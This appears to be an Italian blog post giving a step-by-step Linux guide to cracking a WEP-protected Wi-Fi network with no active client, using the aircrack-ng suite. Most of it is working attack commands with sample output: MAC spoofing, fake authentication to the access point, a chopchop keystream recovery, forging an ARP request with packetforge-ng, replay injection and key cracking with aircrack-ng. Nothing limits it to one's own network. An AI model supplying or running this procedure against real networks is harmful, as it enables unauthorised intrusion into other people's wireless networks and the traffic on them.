Oggi vi presenterò una guida per linux in cui si spiega come fare a craccare una WEP senza client attivo.
Innanzitutto cambiamo il nostro MAC:
Codice: |
ifconfig <interfaccia> down ifconfig <interfaccia> hw ether <nuovo MAC> ifconfig <interfaccia> up |
Codice: |
airmon-ng start <interfaccia> |
Codice: |
airodump-ng -c <canale> --bssid <Access Point MAC> -w <file> <interfaccia> |
Codice: |
aireplay-ng -9 <interfaccia> |
Codice: |
iwconfig <interfaccia> rate 1M |
Ci autentichiamo all'Access Point:
Codice: |
aireplay-ng -1 0 -q 20 -e <Access Point ESSID> -a <Access Point MAC> -h <nostro MAC> <interfaccia> |
-1 indica la fake authentication
-q indica di mandare pacchetti ogni tot secondi per mantenere la connessione attiva
Il sistema risponderà:
- 18:18:20 Sending Authentication Request
18:18:20 Authentication successful
18:18:20 Sending Association Request 18:18:20 Association successful
connessione stabilita
Codice: |
aireplay-ng -4 -h <nostro MAC> -b <Access Point MAC> <interfaccia> |
Il sistema risponderà:
- Waiting for a data packet...
Read 127 packets...
Size: 114, FromDS: 1, ToDS: 0 (WEP)
BSSID = XX:XX:XX:XX:XX:XX
Dest. MAC = XX:XX:XX:XX:XX:XX
Source MAC = XX:XX:XX:XX:XX:XX
0x0000: 0842 0000 0100 5e00 00fb 0014 6c7e 4080 .B....^.....l~@.
0x0010: 0040 f477 e5c9 6052 8c00 0000 3073 d265 .@.w..`R....0s.e
0x0020: c402 790b 2293 c7d5 89c5 4136 7283 29df ..y.".....A6r.).
0x0030: 4e9e 5e13 5f43 4ff5 1b37 3ff9 4da4 c03b N.^._CO..7?.M..;
0x0040: 8244 5882 d5cc 7a1f 2b9b 3ef0 ee0f 4fb5 .DX...z.+.>...O.
0x0050: 4563 906d 0d90 88c4 5532 a602 a8ea f8e2 Ec.m....U2......
0x0060: c531 e214 2b28 fc19 b9a8 226d 9c71 6ab1 .1..+(...."m.qj.
0x0070: 9c9f ..
Use this packet ? y
Premiamo "y" per dare conferma
Il sistema risponderà:
- Offset 48 (71% done) | xor = 34 | pt = E5 | 48 frames written in 142ms
Offset 47 (73% done) | xor = 34 | pt = 77 | 64 frames written in 192ms
Offset 46 (75% done) | xor = 51 | pt = F4 | 253 frames written in 759ms
Offset 45 (76% done) | xor = 98 | pt = 40 | 109 frames written in 327ms
Offset 44 (78% done) | xor = 3D | pt = 00 | 242 frames written in 726ms
Offset 43 (80% done) | xor = 5E | pt = 01 | 194 frames written in 583ms
Offset 42 (82% done) | xor = AF | pt = 00 | 99 frames written in 296ms
Offset 41 (84% done) | xor = C4 | pt = 04 | 164 frames written in 492ms
Offset 40 (86% done) | xor = CE | pt = 06 | 69 frames written in 207ms
Offset 39 (88% done) | xor = 9D | pt = 00 | 137 frames written in 411ms
Offset 38 (90% done) | xor = FD | pt = 08 | 229 frames written in 688ms
Offset 37 (92% done) | xor = 13 | pt = 01 | 232 frames written in 695ms
Offset 36 (94% done) | xor = 83 | pt = 00 | 19 frames written in 58ms
Offset 35 (96% done) | xor = 4E | pt = 06 | 230 frames written in 689ms
Saving keystream in replay_dec-xxxx-xxxxxx.xor
copiamo il nome replay_dec-xxxx-xxxxxx.xor e lo incolliamo nel passo successivo per creare il pacchetto con packetforge
Codice: |
packetforge-ng -0 -a <Access Point MAC> -h <nostro MAC> -k 255.255.255.255 -l 255.255.255.255 -y replay_dec-xxxx-xxxxxx.xor -w arp-request |
-l indica l'IP sorgente - lasciamo 255.255.255.255
-k indica l'IP destinazione - lasciamo 255.255.255.255
Il sistema risponderà:
- Wrote packet to: arp-request
iniettiamo i pacchetti
Codice: |
aireplay-ng -2 -r arp-request <interfaccia> |
- size: 68, FromDS: 0, ToDS: 1 (WEP)
BSSID = XX:XX:XX:XX:XX:XX
Dest. MAC = XX:XX:XX:XX:XX:XX
Source MAC = XX:XX:XX:XX:XX:XX
0x0000: 0841 0201 0014 6c7e 4080 0009 5bec eef2 .A....l~@...[...
0x0010: ffff ffff ffff 8001 8f00 0000 7af3 8be4 ............z...
0x0020: c587 b696 9bf0 c30d 9cd9 c871 0f5a 38c5 ...........q.Z8.
0x0030: f286 fdb3 55ee 113e da14 fb19 17cc 0b5e ....U..>.......^
0x0040: 6ada 92f2 j...
Use this packet ? y
Premiamo "y" per dare conferma
Controlliamo che su airodump che i #data arrivino a circa 50.000 e lanciamo aircrack:
Codice: |
aircrack-ng -z -b <Access Point MAC> <file*.cap> |
Nessun commento:
Posta un commento